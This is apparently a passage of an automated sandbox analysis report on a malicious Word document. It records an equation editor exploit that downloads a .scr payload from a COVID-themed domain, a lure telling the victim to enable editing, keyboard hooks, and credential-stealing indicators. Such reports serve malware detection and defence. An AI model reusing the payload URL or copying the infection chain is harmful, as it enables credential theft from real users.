                    Source: EQNEDT32.EXE, 00000002.00000002.341543164.0000000000349000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.341543164.0000000000376000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.341543164.00000000002FB000.00000004.00000020.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.627022282.0000000005449000.00000004.00000020.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.628212267.0000000005BC1000.00000004.00000020.00020000.00000000.sdmp, obimohohj75.scr.2.dr, pgZzUFYKXcIRkU.exe.5.dr, xobizx[1].scr.2.drString found in binary or memory: http://ocsp.comodoca.com0
                    Source: EQNEDT32.EXE, 00000002.00000002.341543164.0000000000349000.00000004.00000020.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.627022282.0000000005449000.00000004.00000020.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.628212267.0000000005BC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                    Source: EQNEDT32.EXE, 00000002.00000002.341543164.0000000000349000.00000004.00000020.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.627022282.0000000005449000.00000004.00000020.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.628212267.0000000005BC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                    Source: EQNEDT32.EXE, 00000002.00000002.341543164.0000000000349000.00000004.00000020.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.627022282.0000000005449000.00000004.00000020.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.628212267.0000000005BC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                    Source: EQNEDT32.EXE, 00000002.00000002.341543164.0000000000349000.00000004.00000020.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.627022282.0000000005449000.00000004.00000020.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.628212267.0000000005BC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                    Source: EQNEDT32.EXE, 00000002.00000002.341543164.0000000000349000.00000004.00000020.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.627022282.0000000005449000.00000004.00000020.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.628212267.0000000005BC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                    Source: EQNEDT32.EXE, 00000002.00000002.341543164.0000000000349000.00000004.00000020.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.627022282.0000000005449000.00000004.00000020.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.628212267.0000000005BC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                    Source: obimohohj75.scr, 00000005.00000002.371272562.000000000261B000.00000004.00000800.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 0000000D.00000002.378702669.000000000232B000.00000004.00000800.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.626533099.000000000264D000.00000004.00000800.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.626533099.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.627290510.0000000002241000.00000004.00000800.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.627290510.00000000022E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: EQNEDT32.EXE, 00000002.00000002.341543164.0000000000349000.00000004.00000020.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.627022282.0000000005449000.00000004.00000020.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.628212267.0000000005BC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                    Source: EQNEDT32.EXE, 00000002.00000002.341543164.0000000000349000.00000004.00000020.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.627022282.0000000005449000.00000004.00000020.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.628212267.0000000005BC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                    Source: obimohohj75.scr, 00000005.00000002.371692371.00000000035E1000.00000004.00000800.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.625847603.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: obimohohj75.scr, 0000000E.00000002.626533099.0000000002662000.00000004.00000800.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.627290510.00000000022E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipif8
                    Source: obimohohj75.scr, 00000005.00000002.371692371.00000000035E1000.00000004.00000800.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.626533099.000000000264D000.00000004.00000800.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.625847603.0000000000402000.00000040.00000400.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.626533099.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.627290510.0000000002241000.00000004.00000800.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.627290510.00000000022E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                    Source: pgZzUFYKXcIRkU.exe, 00000016.00000002.627290510.00000000022E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                    Source: obimohohj75.scr, 0000000E.00000002.626533099.000000000264D000.00000004.00000800.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.627290510.00000000022E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/T
                    Source: obimohohj75.scr, 0000000E.00000002.626533099.000000000264D000.00000004.00000800.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.626533099.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.627290510.0000000002241000.00000004.00000800.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.627290510.00000000022E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                    Source: EQNEDT32.EXE, 00000002.00000002.341543164.00000000002FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://covid19help.top/dOzJ
                    Source: EQNEDT32.EXE, 00000002.00000002.341543164.00000000002FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://covid19help.top/t
                    Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.341543164.00000000002FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://covid19help.top/xobizx.scr
                    Source: EQNEDT32.EXE, 00000002.00000002.341543164.00000000002FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://covid19help.top/xobizx.scrC:
                    Source: EQNEDT32.EXE, 00000002.00000002.341543164.00000000002CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://covid19help.top/xobizx.scrY.
                    Source: EQNEDT32.EXE, 00000002.00000002.341543164.00000000002CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://covid19help.top/xobizx.scra
                    Source: EQNEDT32.EXE, 00000002.00000002.341543164.00000000002CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://covid19help.top/xobizx.scrj
                    Source: EQNEDT32.EXE, 00000002.00000002.341543164.00000000002CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://covid19help.top/xobizx.scrkkC:
                    Source: EQNEDT32.EXE, 00000002.00000002.341543164.0000000000349000.00000004.00000020.00020000.00000000.sdmp, obimohohj75.scr, 0000000E.00000002.627022282.0000000005449000.00000004.00000020.00020000.00000000.sdmp, pgZzUFYKXcIRkU.exe, 00000016.00000002.628212267.0000000005BC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                    Source: EQNEDT32.EXE, 00000002.00000002.341543164.0000000000376000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.341543164.00000000002FB000.00000004.00000020.00020000.00000000.sdmp, obimohohj75.scr.2.dr, pgZzUFYKXcIRkU.exe.5.dr, xobizx[1].scr.2.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49164 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49164
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
                    Source: unknownHTTPS traffic detected: 172.67.175.222:443 -> 192.168.2.22:49163 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.22:49164 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.22:49165 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to log keystrokes (.Net Source)
                    Source: 5.2.obimohohj75.scr.35e1930.5.raw.unpack, A1HZ.cs.Net Code: _5O4
                    Source: 5.2.obimohohj75.scr.361c350.6.raw.unpack, A1HZ.cs.Net Code: _5O4
                    Installs a global keyboard hook
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\obimohohj75.scr
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: Scan 368 1.doc, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                    Source: 5.2.obimohohj75.scr.35e1930.5.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 5.2.obimohohj75.scr.361c350.6.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 14.2.obimohohj75.scr.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 5.2.obimohohj75.scr.361c350.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 5.2.obimohohj75.scr.35e1930.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
                    Source: Screenshot number: 4Screenshot OCR: Enable editing") from the yellow bar aboveASSIGNMENTMCS 473: MARKETING MANAGEMENT & STRATEGYSTUDENT
                    Office equation editor drops PE file
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\xobizx[1].scrJump to dropped file
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\obimohohj75.scrJump to dropped file
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrMemory allocated: 770B0000 page execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeMemory allocated: 770B0000 page execute and read and write
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrMemory allocated: 770B0000 page execute and read and write
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeMemory allocated: 770B0000 page execute and read and write
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and write
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrCode function: 5_2_001DD2805_2_001DD280
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrCode function: 5_2_001DB3985_2_001DB398
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrCode function: 5_2_001DEBA85_2_001DEBA8
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrCode function: 5_2_001DDCE95_2_001DDCE9
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrCode function: 5_2_001DC6005_2_001DC600
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrCode function: 5_2_001DD7565_2_001DD756
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrCode function: 5_2_001DFA485_2_001DFA48
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrCode function: 5_2_001DC4C45_2_001DC4C4
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrCode function: 5_2_002E1A385_2_002E1A38
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrCode function: 5_2_002E1D415_2_002E1D41
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrCode function: 5_2_002EB0485_2_002EB048
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrCode function: 5_2_002EB4805_2_002EB480
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrCode function: 5_2_002E34F05_2_002E34F0
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrCode function: 5_2_002E36F05_2_002E36F0
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrCode function: 5_2_002EB9685_2_002EB968
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrCode function: 5_2_002E1A285_2_002E1A28
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrCode function: 5_2_002E0A415_2_002E0A41
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrCode function: 5_2_002E2BF85_2_002E2BF8
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrCode function: 5_2_002EAC025_2_002EAC02
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrCode function: 5_2_002EAC105_2_002EAC10
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrCode function: 5_2_002EBDA05_2_002EBDA0
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrCode function: 5_2_002E0DB05_2_002E0DB0
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrCode function: 5_2_002E0DC05_2_002E0DC0
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrCode function: 5_2_002E0FF95_2_002E0FF9
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeCode function: 13_2_0034520013_2_00345200
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeCode function: 13_2_0034EBA813_2_0034EBA8
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeCode function: 13_2_0034DD2C13_2_0034DD2C
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeCode function: 13_2_00343E0413_2_00343E04
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeCode function: 13_2_0034C60013_2_0034C600
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeCode function: 13_2_0034FA4813_2_0034FA48
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeCode function: 13_2_0034455913_2_00344559
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeCode function: 13_2_00346FE013_2_00346FE0
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeCode function: 13_2_00551A3813_2_00551A38
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeCode function: 13_2_00551D4113_2_00551D41
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeCode function: 13_2_0055B04813_2_0055B048
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeCode function: 13_2_0055B48013_2_0055B480
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeCode function: 13_2_0055B96813_2_0055B968
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeCode function: 13_2_00550A4113_2_00550A41
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeCode function: 13_2_00551A2813_2_00551A28
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeCode function: 13_2_00552BF013_2_00552BF0
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeCode function: 13_2_00552BF813_2_00552BF8
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeCode function: 13_2_0055ABFA13_2_0055ABFA
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeCode function: 13_2_0055AC1013_2_0055AC10
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeCode function: 13_2_00550DC013_2_00550DC0
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeCode function: 13_2_00550DB013_2_00550DB0
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeCode function: 13_2_0055BDA013_2_0055BDA0
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeCode function: 13_2_00550FF913_2_00550FF9
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrCode function: 14_2_001C390014_2_001C3900
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrCode function: 14_2_001CF36014_2_001CF360
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrCode function: 14_2_001C8C0014_2_001C8C00
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrCode function: 14_2_001C451814_2_001C4518
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrCode function: 14_2_001CBE8814_2_001CBE88
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrCode function: 14_2_001C3C4814_2_001C3C48
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrCode function: 14_2_001CE55114_2_001CE551
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrCode function: 14_2_0046098014_2_00460980
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrCode function: 14_2_0046655014_2_00466550
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrCode function: 14_2_004655F014_2_004655F0
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrCode function: 14_2_0046812014_2_00468120
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrCode function: 14_2_00461A4014_2_00461A40
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrCode function: 14_2_0046877814_2_00468778
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeCode function: 22_2_001C390022_2_001C3900
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeCode function: 22_2_001CF36022_2_001CF360
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeCode function: 22_2_001C8C0022_2_001C8C00
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeCode function: 22_2_001C451822_2_001C4518
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeCode function: 22_2_001CBE8822_2_001CBE88
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeCode function: 22_2_001C3C4822_2_001C3C48
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeCode function: 22_2_001CE54A22_2_001CE54A
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeCode function: 22_2_004B655022_2_004B6550
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeCode function: 22_2_004B55F022_2_004B55F0
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeCode function: 22_2_004B098022_2_004B0980
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeCode function: 22_2_004B812022_2_004B8120
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeCode function: 22_2_004B1A4022_2_004B1A40
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeCode function: 22_2_004B877822_2_004B8778
                    Source: tmp786B.tmp.5.drOLE indicator, VBA macros: true
                    Source: tmp786B.tmp.5.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                    Source: Scan 368 1.doc, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                    Source: 5.2.obimohohj75.scr.35e1930.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 5.2.obimohohj75.scr.361c350.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 14.2.obimohohj75.scr.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 5.2.obimohohj75.scr.361c350.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 5.2.obimohohj75.scr.35e1930.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: xobizx[1].scr.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: obimohohj75.scr.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: pgZzUFYKXcIRkU.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 5.2.obimohohj75.scr.35e1930.5.raw.unpack, YsTq4S.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 5.2.obimohohj75.scr.35e1930.5.raw.unpack, YsTq4S.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 5.2.obimohohj75.scr.35e1930.5.raw.unpack, ZNczHvI78.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 5.2.obimohohj75.scr.35e1930.5.raw.unpack, ZNczHvI78.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 5.2.obimohohj75.scr.35e1930.5.raw.unpack, ZNczHvI78.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 5.2.obimohohj75.scr.35e1930.5.raw.unpack, ZNczHvI78.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 5.2.obimohohj75.scr.35e1930.5.raw.unpack, G2Tmmpnyphl.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 5.2.obimohohj75.scr.35e1930.5.raw.unpack, G2Tmmpnyphl.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 5.2.obimohohj75.scr.61d0000.10.raw.unpack, G2ZSj4grjIGLRxUPme.csSecurity API names: _0020.SetAccessControl
                    Source: 5.2.obimohohj75.scr.61d0000.10.raw.unpack, G2ZSj4grjIGLRxUPme.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 5.2.obimohohj75.scr.61d0000.10.raw.unpack, G2ZSj4grjIGLRxUPme.csSecurity API names: _0020.AddAccessRule
                    Source: 5.2.obimohohj75.scr.61d0000.10.raw.unpack, NZ3F1JZLvRhU8cxwHy.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOC@26/22@5/3
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$an 368 1.docJump to behavior
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeMutant created: NULL
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeMutant created: \Sessions\1\BaseNamedObjects\sgWhCAggfQPwpXhx
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR5BC5.tmpJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................%.........................s............................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................&.........................s..............U.............................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................V&.........................s............................x...............Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................&.........................s..............U.............................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................&.........................s............................x...............Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................&.........................s..............U.............................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n................................&.........................s..............U.............x...............Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................&.........................s..............U.............x...............Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..........&.........................s..............U..... .......x...............Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................&.........................s..............U.............x...............Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................'.........................s............................x...............Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................'.........................s..............U.............................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~......'.........................s..............U.....$.......x...............Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................='.........................s..............U.............x...............Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................O'.........................s............................x...............Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................['.........................s..............U.............................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s..............U.....2.......x...............Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................y'.........................s..............U.............x...............Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................'.........................s....................l.......x...............Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................'.........................s..............U.............................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P..............................'.........................s..............U.............x...............Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................'.........................s..............U.............x...............Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................%.........................s............................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................%.........................s............................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................0%.........................s............................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................?%.........................s............................................Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................U%.........................s............................................Jump to behavior
